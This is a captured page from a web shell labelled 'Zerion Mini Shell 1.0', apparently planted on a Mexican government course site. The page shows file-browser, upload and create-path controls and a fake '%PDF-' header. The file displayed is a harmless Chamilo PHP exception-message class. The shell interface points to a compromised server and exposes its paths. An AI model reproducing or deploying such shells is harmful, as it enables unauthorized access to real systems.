%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/cursos.tjamich.gob.mx/plugin/migrationmoodle/src/Messages/
Upload File :
Create Path :
Current File : /home/tjamichg/cursos.tjamich.gob.mx/plugin/migrationmoodle/src/Messages/ExtractMessage.php

<?php
/* For licensing terms, see /license.txt */

namespace Chamilo\PluginBundle\MigrationMoodle\Messages;

use Throwable;

/**
 * Class ExtractException.
 *
 * @package Chamilo\PluginBundle\MigrationMoodle\Messages
 */
class ExtractMessage extends Message
{
    /**
     * ExtractMessage constructor.
     */
    public function __construct(Throwable $previous = null)
    {
        $message = 'Error while extracting data.';

        parent::__construct($message, $previous);
    }
}

Zerion Mini Shell 1.0